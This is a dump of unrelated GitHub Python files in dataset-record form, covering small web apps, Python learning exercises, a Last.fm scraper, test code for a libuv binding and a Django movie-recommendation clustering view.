lim = user.lvl+1\n if lim > 10:\n lim = 10\n lvl = []\n for i in range(0, lim):\n t = \"lvl \" + str(i)\n lvl.append(_(t))\n\n tit = _(\"lvl \" + str(user.lvl))\n template_values = {\n 'sns' : opensns.sns,\n 'lang' : lang,\n 'sns_uid': sns_uid, \n 'user': user,\n 'lvl': lvl,\n 'tit': tit,\n }\n\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n path = os.path.join(os.path.dirname(__file__), 'template/index.html')\n self.response.out.write(template.render(path, template_values))\n\n def ask_auth(self, url):\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n self.response.out.write(\"\"\"\n \n \n auth \n \n \n \n \n \"\"\");\n\n\ndef main():\n application = webapp.WSGIApplication([('/', MainHandler), \n ('/start', StartHandler), \n ('/result', ResultHandler),\n ('/rank', RankHandler),\n ('/recentgames', RecentGamesHandler),\n ('/cleangames', CleanGamesHandler),\n ('/phone_reg', PhoneRegHandler),\n ('/phone_recent', PhoneRecentHandler),\n ('/help', HelpHandler),\n ('/cellphone', CellPhoneHandler),\n ('/invite', InviteHandler),\n ('/admin', AdminHandler)],\n debug=True)\n util.run_wsgi_app(application)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ZhouWeikuan/DreamHost","sub_path":"games/appspot/goosezh/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12962,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"71262453609","text":"def select_cate(l,c):\n img = []\n for i in xrange(len(l[0])):\n if l[1][i] == c:\n img.append(l[0][i])\n return img\n\nfrom matplotlib import pyplot as plt\ndef show_img(num, data, c):\n l = select_cate(data,c)\n f = plt.figure()\n for i in range(num):\n f.add_subplot(num/5,5,i)\n plt.imshow(l[i], interpolation='nearest', cmap='Greys_r')\n\n plt.show()\n\nimport data_loader\ntrain = data_loader.load_data()\nshow_img(5,train,4)\n","repo_name":"Jerrycjw/Facial_emotion_detect","sub_path":"analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28755493377","text":"#Insertion Sort (iterative)\r\n\r\na=list(map(int,input().split()))\r\n\r\nfor i in range(1,len(a)):\r\n k=a[i] \r\n j=i-1 \r\n\r\n while j>=0 and a[j]>k: \r\n a[j+1]=a[j] \r\n j-=1\r\n a[j+1]=k \r\nprint(\"Sorted Array: \",a)","repo_name":"Poorna525/python-lab1","sub_path":"l12iterativeinsertionsort.py","file_name":"l12iterativeinsertionsort.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36467820222","text":"\"\"\"yoshlar = int(input(\"Yoshingiz nechida? \" ))\r\nif yoshlar < 4:\r\n print(\"Siz uchun bepul\")\r\nelif yoshlar < 12:\r\n print(\"Siz uchun kirish narxi 5 000 so'm\")\r\nelif yoshlar < 18:\r\n print(\"Siz uchun kirish narxi 10 000 so'm\")\r\nelse:\r\n print(\"Siz uchun kirish narxi 15 000 so'm\")\r\n \"\"\"\r\n \r\n \r\n \r\n \r\n\r\n#yoshlar = int(input(\"Yoshingiz nechida? \" ))\r\n#if yoshlar <= 4:\r\n# narh = 0\r\n#elif yoshlar <= 12:\r\n# narh = 5000\r\n#elif yoshlar <= 18:\r\n# narh = 10000\r\n#else:\r\n# narh = 15000\r\n#print(f\"Siz uchun kirish narxi {narh} so'mni tashkil etadi\")\r\n\r\n\r\n#kun = input(\"Bugun qanaqa kun? \")\r\n#if kun.lower()=='shanba' or kun.lower()==\"yakshanba\":\r\n# print(\"Bugun dam olish kuni\")\r\n#else:\r\n# print(\"Bugun ish kuni\")\r\n\r\n\r\n#kun = input(\"Bugun nima kun? \")\r\n#harorat = float(input('Bugun havo harorati nechchi? '))\r\n#if kun.lower()==\"shanba\" or 'yakshanba' and harorat >= 30:\r\n# print(\"Qani ketdik cho'milishga\")\r\n#elif kun.lower()==\"shanba\" or 'yakshanba' and harorat <= 30:\r\n# print(\"Uyda qolamiz\")\r\n#elif kun.lower()==\"dushanba\" or 'seshanba' or 'chorshanba' or 'payshanba' or 'juma' and harorat <= 30 or harorat >= 30:\r\n# print(\"Ishga sur\")\r\n#else:\r\n# print('Bilganingni qile')\r\n\r\n#narh = 15000\r\n#salat = True\r\n#choy = False \r\n#if choy and salat:\r\n# narh = narh + 10000\r\n#elif choy or salat:\r\n# narh = narh + 5000\r\n#print(f\"Jami {narh} so'm\")\r\n\r\n#narh = 10000\r\n#salat = True\r\n#non = True\r\n#kompot = False\r\n#assorti = True\r\n#fanta = False\r\n#if salat:\r\n# narh = narh + 7000\r\n#if non:\r\n# narh = narh + 3500\r\n#if kompot:\r\n# narh = narh = 8000\r\n#if assorti:\r\n# narh = narh + 12000\r\n#if fanta:\r\n# narh = narh + 10000\r\n#\r\n#print(f\"Jami {narh} so'm\")\r\n#\r\n\r\n#menu = ['osh', 'manti', 'kabob', 'barak']\r\n#ovqat = input('Nima ovqat yeysiz? ')\r\n#\r\n#if ovqat.lower() in menu:\r\n# print(\"Buyurtma qabul qilindi.\")\r\n#else:\r\n# print(f\"Uzur menuda '{ovqat}' yo'q ekan. \")\r\n\r\n\"\"\"buyurtmalar = ['osh', 'manti', 'kabob', 'barak']\r\nmenu = ['osh', 'manti', 'kabob', 'barak', 'shashlik', 'honim']\r\ntaom = []\r\n#for taom in menu:\r\n# if taom in buyurtmalar:\r\n# print(f\"Menuda {taom} bor\")\r\n# else:\r\n# print(f\"menida {taom} yo'q\")\r\nif buyurtmalar:\r\n print(f\"royxatda {len(buyurtmalar)} ta buyurtma bor.\")\r\nelse:\r\n print(\"royxar bo'sh\")\"\"\"\r\n\r\n#car = {'rangi':'Qizil', 'model':'Ferrari', 'turi':'supercar' }\r\n#print(car['rangi'])\r\n#print(car['model'])\r\n#print(car['turi'])\r\n\r\n#uz_en = {'noutbuk':'laptop', 'olma':'apple', 'mouse':'sichqon'}\r\n#print(uz_en['noutbuk'])\r\n\r\n#talaba_0 = {'ism':'murod olimov','yosh':20,'t_yil':2000}\r\n#talaba_0['kurs'] = 4 # yangi, 'kurs' nomli kalit so'zga 4 qiymatini yuklaymiz\r\n#talaba_0['fakultet'] = 'informatika' # 'fakultet' ga esa 'informatika' \r\n#print(f\"{talaba_0['ism'].title()},\\\r\n#{talaba_0['t_yil']}-yilda tu'gilgan,\\\r\n#{talaba_0['yosh']} yoshda, \\\r\n#{talaba_0['kurs']}-kurs,\\\r\n#{talaba_0['fakultet']} fakulteti\")\r\n \r\n#telefonlar = {\r\n# 'ali':'iphone x',\r\n# 'vali':'galaxy s9',\r\n# 'olim':'mi 10 pro',\r\n# 'orif':'nokia 3310'\r\n# }\r\n#\r\n#phone = telefonlar.get('hasan','Bunday ism mavjud emas')\r\n\r\n#talaba_0 = {\r\n# 'Ism' : 'Ali',\r\n# 'Yosh' : '22',\r\n# 'Manzil' : 'Samarqand'\r\n# }\r\n#\r\n#for kalit, qiymat in talaba_0.items():\r\n# print(f\"Kalit: {kalit}\")\r\n# print(f\"Qiymat: {qiymat} \\n\")\r\n\r\n#telefonlar = {\r\n# 'ali':'iphone x',\r\n# 'vali':'galaxy s9',\r\n# 'olim':'mi 10 pro',\r\n# 'orif':'nokia 3310'\r\n#}\r\n#\r\n#for k, v in telefonlar.items():\r\n# print(f\"{k}ning telefoni: {v}\")\r\n\r\n\r\n#mahsulotlat = {\r\n# 'olma' : 10000,\r\n# 'anor' : 20000,\r\n# 'limon' : 5000,\r\n# 'shaftoli' : 50000\r\n#}\r\n#\r\n#for mahsulot in mahsulotlat.keys():\r\n# print(mahsulot.title())\r\n\r\n#mahsulotlat = {\r\n# 'olma' : 10000,\r\n# 'anor' : 20000,\r\n# 'limon' : 5000,\r\n# 'shaftoli' : 50000\r\n#}\r\n#\r\n#for mahsulot in mahsulotlat.values():\r\n# print(mahsulot)\r\n\r\n\r\ntelefonlar = {\r\n 'ali':'iphone x',\r\n 'vali':'galaxy s9',\r\n 'olim':'mi 10 pro',\r\n 'orif':'nokia 3310',\r\n 'hamida':'galaxy s9',\r\n 'maryam':'huawei p30',\r\n 'tohir':'iphone x',\r\n 'umar':'iphone x' \r\n }\r\n\r\nprint('Foydalanuvchilar quyidagi telefonlarni ishlatishadi:')\r\nfor tel in set(telefonlar.values()):\r\n print(tel)","repo_name":"YupBekha/lessons","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14534579794","text":"\"\"\"\nSolves for advent of code 20211201\n\"\"\"\nimport os\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\nINPUT = []\n\nwith open(os.path.join(SCRIPT_DIR, \"input.txt\"), \"r\") as file:\n for line in file:\n INPUT.append(int(line.strip('\\n')))\n\nprint('Processed ' + str(len(INPUT)) + ' instructions')\n\nDEEPER_COUNT = -1\nPREV_DEPTH = 0\nfor depth in INPUT:\n if depth > PREV_DEPTH:\n DEEPER_COUNT += 1\n PREV_DEPTH = depth\n\nprint('Found ' + str(DEEPER_COUNT) + ' deeper depths')\n\nDEEPER_COUNT = -1\nINPT_INDEX = 0\nPREV_DEPTH = 0\nwhile INPT_INDEX <= len(INPUT) - 3:\n if (INPUT[INPT_INDEX] + INPUT[INPT_INDEX + 1] + INPUT[INPT_INDEX + 2]) > PREV_DEPTH:\n DEEPER_COUNT += 1\n PREV_DEPTH = INPUT[INPT_INDEX] + INPUT[INPT_INDEX + 1] + INPUT[INPT_INDEX + 2]\n INPT_INDEX += 1\n\nprint('Found ' + str(DEEPER_COUNT) + ' deeper depths')\n","repo_name":"jtmach/AdventOfCode2019","sub_path":"20211201/20211201.py","file_name":"20211201.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34909140070","text":"# from django.contrib.sites import requests\nimport requests\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework import status, generics, views\nfrom rest_framework.response import Response\nfrom rest_framework.reverse import reverse\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom rest_framework.views import APIView\nfrom djoser.conf import django_settings\nfrom django.utils.crypto import get_random_string\n\nfrom .models import User, LogInfo\n\n\n# Create your views here.\nfrom .serializers import CurrentUserSerializer, LogInfoSerializer\n\n\n@api_view(['GET'])\ndef restricted(request, *args, **kwargs):\n return Response(data='Only for logged-in users', status=status.HTTP_200_OK)\n\n\n# class UserActivationView(APIView):\n# def get(self, request, uid, token):\n# protocol = 'https://' if request.is_secure() else 'http://'\n# web_url = protocol + request.get_host()\n# post_url = web_url + \"/auth/users/activate/\"\n# post_data = {'uid': uid, 'token': token}\n# result = requests.post(post_url, data = post_data)\n# content = result.text()\n# return Response(content)\n\n\n# class ActivateUser(GenericAPIView):\n#\n# def get(self, request, uid, token, format=None):\n# payload = {'uid': uid, 'token': token}\n# protocol = 'https://' if request.is_secure() else 'http://'\n# domain = request.get_host()\n# url = f\"{protocol}{domain}/auth/users/activation/\"\n# response = requests.post(url, data=payload)\n#\n# if response.status_code == 204:\n# return Response({}, response.status_code)\n# else:\n# return Response(response.json())\n\n\nclass PasswordReset(GenericAPIView):\n\n def get(self, request, uid, token, format=None):\n payload = {'uid': uid, 'token': token}\n\n return JsonResponse(payload)\n\n\n@api_view(['GET', ])\ndef add_log_info(request):\n \"\"\" Created a new session code \"\"\"\n\n if request.method == 'GET':\n code = get_random_string(length=12)\n while LogInfo.objects.filter(code=code).first():\n code = get_random_string(length=12)\n save_log(request, code)\n return Response(data=code, status=status.HTTP_200_OK)\n\n\ndef save_log(request, code):\n device = ''\n ip = get_client_ip(request)\n print(ip)\n if request.user_agent.is_mobile:\n device = 'Mobile'\n elif request.user_agent.is_tablet:\n device = 'Tablet'\n elif request.user_agent.is_pc:\n device = 'PC'\n elif request.user_agent.is_bot:\n device = \"Bot\"\n\n if request.user_agent.is_touch_capable:\n device += '-Touch'\n if request.user.is_anonymous:\n current_user = None\n else:\n current_user = request.user\n device_family = request.user_agent.device.family # returns 'iPhone'\n print(request.user_agent)\n browser = request.user_agent.browser.family # returns 'Mobile Safari'\n operating_system = f'{request.user_agent.os.family}({request.user_agent.os.version_string})'\n new_log = LogInfo(code=code, device=device, device_family=device_family,\n browser=browser, operating_system=operating_system, user=current_user, ip=ip)\n new_log.save()\n\n\ndef get_client_ip(request):\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n print(x_forwarded_for)\n print(request.META)\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n return ip","repo_name":"walidzakaria/dao-clinic","sub_path":"apps/authapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71256421927","text":"from model import CharacterGenerator\nfrom app import schema_data\nfrom helper import LabelJson, pool_queue\n\n\nasync def request_data(queue):\n await pool_queue(queue=queue, _class=CharacterGenerator())\n task = await queue.get()\n data = schema_data()\n file_json = LabelJson()\n\n if data.get('npc', False):\n npc = task.character('npc')\n lobby = npc.npc_begin(data['type_loby'], data['name_npc'])\n await file_json.mk_file_json(lobby.__str__())\n\n elif data.get('player', False):\n player = task.character('player')\n lobby = player.player_begin(data['race_player'], data['class_player'])\n await file_json.mk_file_json(lobby.__str__())\n","repo_name":"HugoItaloMC/pyac","sub_path":"geek_university/async_python/tests/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1179291942","text":"import requests\nimport json\nimport pandas as pd\nimport xlsxwriter\nimport time\nimport os\n\ndef load_data_from_excel(csv_input):\n request_query = []\n req = {}\n data = pd.read_excel(r''+csv_input)\n if 'Title' in data and 'Artist' in data:\n data = data.rename(columns={'Title': 'title', 'Artist': 'artist'})\n df = pd.DataFrame(data, columns=['title', 'artist'])\n # print(df)\n for index, row in df.iterrows():\n req['method'] = 'track.getInfo'\n req['autocorrect'] = 1\n req['track'] = row['title'][1:-1]\n req['artist'] = row['artist']\n request_query.append(req)\n req = {}\n return request_query\n\n\ndef convert(millis):\n # millis = int(millis)\n seconds = (millis / 1000) % 60\n seconds = int(seconds)\n minutes = (millis / (1000 * 60)) % 60\n minutes = int(minutes)\n # hours = (millis / (1000 * 60 * 60)) % 24\n return (\"%02d:%02d\" % (minutes, seconds))\n # seconds = seconds % (24 * 3600)\n # hour = seconds // 3600\n # seconds %= 3600\n # minutes = seconds // 60\n # seconds %= 60\n # return \"%d:%02d:%02d\" % (hour, minutes, seconds)\n\n\ndef count_listeners(data_json):\n # print(jprint(data_json))\n out_p = {}\n if 'track' in data_json:\n count = data_json['track']['playcount']\n listener = data_json['track']['listeners']\n duration = convert(int(data_json['track']['duration']))\n # for each in data_json['track']['playcount']['track']:\n # count = count + int(each['listeners'])\n # # print(each['listeners'], each['name'])\n # print('count is', count, \"listener is\", listener, 'duration is', duration)\n out_p['playcount'] = int(count)\n out_p['listeners'] = int(listener)\n out_p['duration'] = duration\n else:\n # print(\"not found\")\n out_p['playcount'] = -1\n out_p['listeners'] = -1\n out_p['duration'] = -1\n return out_p\n\ndef lastfm_get(payload):\n ys = 'ca791ebdea3b7ba81ff4bd70cff59124423'\n ys=ys[1:-2]\n USER_AGENT = 'law-school-copyright'\n # define headers and URL\n headers = {'user-agent': USER_AGENT}\n url = 'http://ws.audioscrobbler.com/2.0/'\n\n # Add API key and format to the payload\n payload['api_key'] = ys\n payload['format'] = 'json'\n\n response = requests.get(url, headers=headers, params=payload)\n # print(payload['artist'], payload['track'])\n text = response.json()\n out_dict = count_listeners(text)\n return out_dict\n\n\ndef jprint(obj):\n # create a formatted string of the Python JSON object\n text = json.dumps(obj, sort_keys=True, indent=4)\n return text\n\n\ndef perform_last_fm(data, current_finished_count,total_records):\n if 'Title' in data and 'Artist' in data:\n data = data.rename(columns={'Title': 'title', 'Artist': 'artist'})\n df = pd.DataFrame(data, columns=['title', 'artist'])\n # print(df)\n request_query = []\n req = {}\n for index, row in df.iterrows():\n req['method'] = 'track.getInfo'\n req['autocorrect'] = 1\n # print('track,', row['title'])\n req['track'] = row['title'][1:-1]\n req['artist'] = row['artist']\n request_query.append(req)\n req = {}\n out_query = []\n out_dict = {}\n i = 0\n for each in request_query:\n out_dict['artist'] = each['artist']\n out_dict['track'] = each['track']\n # print(each)\n max_retry=10\n current_retry=0\n is_api_success=False\n while not is_api_success and current_retry {}'.format(k, v))\n for k, v in filter_errs:\n os.system('rm -rf {}'.format(v))\n print('[delete] old params {} --> {}'.format(k, v))\n\n\n wirter.close()","repo_name":"ustcylw/FL_v1.0","sub_path":"train_v1.py","file_name":"train_v1.py","file_ext":"py","file_size_in_byte":9305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34308904184","text":"class Personaje:\n def __init__(self, name, status, species, gender, img, location):\n self.name = name\n self.status = status\n self.species = species\n self.gender = gender\n self.img = img\n self.location = location\n \n def to_json(self):\n return {\n 'name': self.name,\n 'status': self.status,\n 'species': self.species,\n 'gender': self.gender,\n 'img': self.img,\n 'location': self.location\n }","repo_name":"LilXhan/new-flask","sub_path":"app/models/personaje.py","file_name":"personaje.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19319040698","text":"# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append('.')\nfrom common import TestCase\nimport unittest\nimport fatuv as uv\nimport os\nfrom _fatcore import lib\nimport json\n\n\n__dir__ = os.path.dirname(os.path.realpath(__file__))\n\ndef resolve_path(relative_path):\n\treturn os.path.join(__dir__, 'data', relative_path)\n\nPROGRAM_HELLO = resolve_path('program_hello.py')\nPROGRAM_ENDLESS_LOOP = resolve_path('program_endless_loop.py')\nPROGRAM_DUMP_ENV = resolve_path('program_dump_env.py')\n\nTEST_PIPE1 = '/tmp/python-uv-test1'\n\nclass TestProcess(TestCase):\n\tdef test_process_hello(self):\n\t\targuments = [sys.executable, PROGRAM_HELLO]\n\t\tself.buffer = b''\n\t\tself.returncode = None\n\n\t\tdef on_exit(process_handle, returncode, term_signal):\n\t\t\tself.returncode = returncode\n\n\t\tdef on_read(pipe_handle,data,status):\n\t\t\tif data:\n\t\t\t\tself.buffer += data\n\n\t\tself.pipe = uv.Pipe(self.loop)\n\t\tself.pipe.bind(TEST_PIPE1)\n\n\t\tself.process = uv.Process(self.loop, arguments, stdout=uv.process.PIPE, stdio=[self.pipe],\n\t\t\t\t\t\t\t\t callback=on_exit)\n\t\tself.process.stdout.start_read(on_read)\n\n\t\tself.loop.run()\n\n\t\tself.assert_equal(self.buffer.strip(), b'hello')\n\t\tself.assert_equal(self.returncode, 1)\n\t\tself.assert_not_equal(self.process.pid, None)\n\t\tself.assert_raises(uv.error.UVError, self.process.kill)\n\n\t\tself.process.close()\n\n\t\tself.assert_raises(uv.HandleClosedError, self.process.kill)\n\t\twith self.should_raise(uv.HandleClosedError):\n\t\t\tpid = self.process.pid\n\n\tdef test_process_endless_loop(self):\n\t\targuments = [sys.executable, PROGRAM_ENDLESS_LOOP]\n\n\t\tself.returncode = None\n\t\tself.term_signal = None\n\n\t\tdef on_exit(process_handle, returncode, term_signal):\n\t\t\tself.returncode = returncode\n\t\t\tself.term_signal = term_signal\n\n\t\tdef on_prepare(prepare_handle):\n\t\t\tprepare_handle.close()\n\t\t\tself.process.kill()\n\n\t\tself.process = uv.Process(self.loop, arguments, callback=on_exit)\n\t\tself.prepare = uv.Prepare(self.loop)\n\t\tself.prepare.start(on_prepare)\n\n\t\tself.loop.run()\n\n\t\tself.assert_is_not(self.returncode, None)\n\t\tself.assert_is_not(self.term_signal, None)\n\n\tdef test_process_dump_env(self):\n\t\targuments = [sys.executable, PROGRAM_DUMP_ENV]\n\t\tprint(PROGRAM_DUMP_ENV)\n\t\tself.buffer = b''\n\t\tself.returncode = None\n\n\t\tdef on_exit(process_handle, returncode, term_signal):\n\t\t\tself.returncode = returncode\n\n\t\tdef on_read(pipe_handle, data, nread):\n\t\t\tif nread > 0:\n\t\t\t\tself.buffer += data\n\n\t\tenv = {'hello': 'world'}\n\t\tself.process = uv.Process(self.loop, arguments, env=env, stdout=uv.process.PIPE, callback=on_exit,\n\t\t\t\t\t\t\t\t cwd=resolve_path(''))\n\t\tself.process.stdout.start_read(on_read)\n\n\t\tself.loop.run()\n\n\t\tself.assert_equal(self.returncode, 0)\n\t\tself.assert_not_equal(self.process.pid, None)\n\n\t\tresult = json.loads(self.buffer.decode())\n\t\tself.assert_equal(result['hello'], 'world')\n\t\tself.assert_true(result['cwd'].endswith('tests/data'))\n\n\tdef test_unknown_file(self):\n\t\targuments = [sys.executable, PROGRAM_HELLO]\n\t\tself.assert_raises(uv.error.ArgumentError, uv.Process, self.loop, arguments, stdout='abc')\n\nif __name__ == '__main__':\n\tunittest.main(verbosity=2)\n","repo_name":"kasicass/fatuv","sub_path":"tests/test_process.py","file_name":"test_process.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"15633780979","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nfrom xml.sax import make_parser\nfrom xml.sax.handler import ContentHandler\nfrom smallsmilhandler import SmallSMILLHandler\nfrom urllib.request import urlretrieve\nimport sys\nimport json\n\nclass KaraokeLocal():\n def __init__(self, filename):\n parser = make_parser()\n SmallSmill = SmallSMILLHandler()\n parser.setContentHandler(SmallSmill)\n parser.parse(open(filename))\n self.lista = SmallSmill.get_tags()\n\n def __str__(self):\n output = \"\"\n for elementDicc in self.lista:\n output += elementDicc['etiqueta'] + '\\t'\n for atributo in elementDicc:\n if atributo != \"etiqueta\" and elementDicc[atributo]:\n output += atributo + \"=\" + elementDicc[atributo] + \"\\t\"\n output = output[:-1] + '\\n'\n return output\n\n def to_json(self, filejson):\n if filejson.endswith(\".smil\"):\n filejson = filejson.replace(\".smil\",\".json\")\n\n with open(filejson, \"w\") as outfile:\n json.dump(self.lista, outfile, indent=1)\n\n def dolocal(self):\n for elemento in self.lista:\n for atributo in elemento:\n if atributo != \"etiqueta\":\n if elemento[atributo].startswith(\"http://\"):\n url = elemento[atributo]\n Download = url.split(\"/\")[-1]\n urlretrieve(url,Download)\n print(\"Descargando... \" + elemento[atributo])\n elemento[atributo] = elemento[atributo].split(\"/\")[-1]\n\nif __name__ == '__main__':\n\n if len(sys.argv) != 2:\n sys.exit(\"ussage karaoke.py karaoke.smill\")\n else:\n try:\n filename = sys.argv[1]\n filejson = \"local.json\"\n Karaoke = KaraokeLocal(filename)\n print(Karaoke)\n Karaoke.to_json(filename)\n Karaoke.dolocal()\n Karaoke.to_json(filejson)\n print(Karaoke)\n except FileNotFoundError:\n print(\"File has to exist\")\n except IndexError:\n print(\"Ussage karaoke.py file.smil\")\n","repo_name":"ediezbl/PTAVI","sub_path":"ptavi-p3/karaoke2.py","file_name":"karaoke2.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17809412697","text":"import pandas as pd\nimport numpy as np\nimport sqlite3\nimport itertools\nfrom scipy.sparse import csr_matrix\nfrom sklearn.cluster import KMeans, AgglomerativeClustering\nfrom sklearn.mixture import GaussianMixture\nfrom sklearn.metrics import silhouette_samples, silhouette_score, mean_squared_error\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom api.models import Movie, Profile, Rating, Clustering\nfrom api.serializers import MovieSerializer, ClusteringSerializer\nfrom rest_framework.response import Response\nfrom django.db import connection\nfrom django.forms import model_to_dict\n\n\n@api_view(['GET','POST'])\ndef recommend(request):\n\n if request.method == 'GET':\n user_id = request.GET.get('id', None)\n movies = pd.DataFrame(list(Movie.objects.all().values('id','title'))) \n movies.columns = ['movieid', 'title']\n ratings = pd.DataFrame(list(Rating.objects.all().values('userid','movieid','rating')))\n ratings_title = pd.merge(ratings, movies[['movieid', 'title']], on='movieid' )\n\n user_movie_ratings = pd.pivot_table(ratings_title, index='userid', columns= 'title', values='rating')\n user_movie_ratings = user_movie_ratings.reset_index()\n clusters = pd.DataFrame(list(Clustering.objects.all().values('group'))) \n clustered = pd.concat([user_movie_ratings, clusters], axis=1)\n\n cluster = Clustering.objects.all().filter(id = user_id)\n cluster_number = cluster[0].group\n \n # 같은 클러스터 부르기\n cluster = clustered[clustered.group == cluster_number].drop(['group'], axis=1)\n print(cluster)\n # 유저의 ratings을 다 가져온다.\n user_2_ratings = cluster.loc[int(user_id), :]\n # 유저가 보지 않은 영화를 가져온다.\n user_2_unrated_movies = user_2_ratings[user_2_ratings.isnull()]\n # 그 영화의 다른 유저들의 평균을 가져온다\n avg_ratings = pd.concat([user_2_unrated_movies, cluster.mean()], axis=1, join='inner').loc[:,0]\n print(avg_ratings)\n # 정렬 5개\n avg_ratings = avg_ratings.sort_values(ascending=False)[:6]\n movies = avg_ratings.index\n cnt = 0\n recommend_movies = Movie.objects.all().filter(id=-1)\n for movie in movies:\n print(movie)\n cnt+=1\n m = Movie.objects.all().filter(title = movie)\n recommend_movies = recommend_movies.union(m)\n\n serializer = MovieSerializer(recommend_movies, many=True)\n \n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n\n ## 포스트 하면 db.sqlite3에 있는 것 클러스터링 정보 갱신 \n if request.method == 'POST':\n\n cluster = request.data[\"params\"]\n cluster_type = cluster[\"cluster\"]\n # 클러스터 수\n cluster_n = cluster[\"number\"]\n\n movies = pd.DataFrame(list(Movie.objects.all().values('id','title'))) \n movies.columns = ['movieid', 'title']\n ratings = pd.DataFrame(list(Rating.objects.all().values('userid','movieid','rating')))\n ratings_title = pd.merge(ratings, movies[['movieid', 'title']], on='movieid' )\n ##가장 값이 많은 상위 1000개 데이터만 가져온다\n user_movie_ratings = pd.pivot_table(ratings_title, index='userid', columns= 'title', values='rating')\n #most_rated_movies_1k = get_most_rated_movies(user_movie_ratings, 1000)\n #sparse_ratings = csr_matrix(pd.SparseDataFrame(most_rated_movies_1k).to_coo())\n sparse_ratings = csr_matrix(pd.SparseDataFrame(user_movie_ratings).to_coo())\n clustering = \"\"\n # 클러스터링\n print(sparse_ratings)\n con = sqlite3.connect(\"db.sqlite3\")\n if cluster_type :\n if cluster_type == 1 :\n clustering = KMeans(n_clusters=cluster_n, algorithm='full').fit_predict(sparse_ratings)\n if cluster_type == 2 :\n clustering = AgglomerativeClustering(n_clusters=cluster_n, linkage='ward').fit_predict(sparse_ratings.toarray())\n if cluster_type == 3 : \n clustering = GaussianMixture(n_components=cluster_n, covariance_type=\"full\").fit_predict(sparse_ratings.toarray())\n \n \n clustered = pd.concat([user_movie_ratings.reset_index(), pd.DataFrame({'group':clustering})], axis=1)\n clustered = clustered[['userid','group']]\n print(clustered)\n clustered = clustered.fillna('')\n\n clustered.to_sql('cluster', con, if_exists=\"replace\")\n con.close()\n \n '''\n kmeans = KMeans(n_clusters=cluster_n, algorithm='full').fit_predict(sparse_ratings)\n Hierarchical = AgglomerativeClustering(n_clusters=cluster_n, linkage='ward').fit_predict(sparse_ratings.toarray())\n EM = GaussianMixture(n_components=cluster_n, covariance_type=\"full\").fit_predict(sparse_ratings.toarray())\n \n clusters = [kmeans,Hierarchical,EM]\n clustersStr = ['kmeans','Hierarchical','EM']\n\n # db에 저장\n con = sqlite3.connect(\"db.sqlite3\")\n for i in range(0,3):\n clustered = pd.concat([most_rated_movies_1k.reset_index(), pd.DataFrame({'group':clusters[i]})], axis=1)\n clustered = clustered.fillna('')\n clustered.to_sql(clustersStr[i], con, if_exists=\"replace\")\n con.close()\n '''\n con = sqlite3.connect(\"db.sqlite3\")\n cur = con.cursor()\n serializer = ''\n if cluster :\n cur.execute(\"select * from cluster\")\n\n rows = cur.fetchall()\n cnt = 0\n for row in rows:\n if(cnt == len(rows)-1):\n break\n userid = int(row[1])\n group = int(row[-1])\n profile = list(Profile.objects.filter(user_id = userid).values())\n print(profile[0])\n print(profile[0]['user_id'])\n\n Clustering(id = int(profile[0]['user_id']),occupation=profile[0]['occupation'], gender=profile[0]['gender'],age=int(profile[0]['age']),group=group ).save()\n cnt = cnt+1\n clusters = Clustering.objects.all()\n con.close()\n serializer = ClusteringSerializer(clusters, many=True)\n \n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\ndef clustering_errors(k, data):\n kmeans = KMeans(n_clusters=k).fit(data)\n predictions = kmeans.predict(data)\n silhouette_avg = silhouette_score(data, predictions)\n return silhouette_avg\n\ndef sparse_clustering_errors(k, data):\n kmeans = KMeans(n_clusters=k).fit(data)\n predictions = kmeans.predict(data)\n cluster_centers = kmeans.cluster_centers_\n errors = [mean_squared_error(row, cluster_centers[cluster]) for row, cluster in zip(data, predictions)]\n return sum(errors)\n\ndef get_most_rated_movies(user_movie_ratings, max_number_of_movies):\n # 1- Count\n user_movie_ratings = user_movie_ratings.append(user_movie_ratings.count(), ignore_index=True)\n # 2- sort\n user_movie_ratings_sorted = user_movie_ratings.sort_values(len(user_movie_ratings)-1, axis=1, ascending=False)\n user_movie_ratings_sorted = 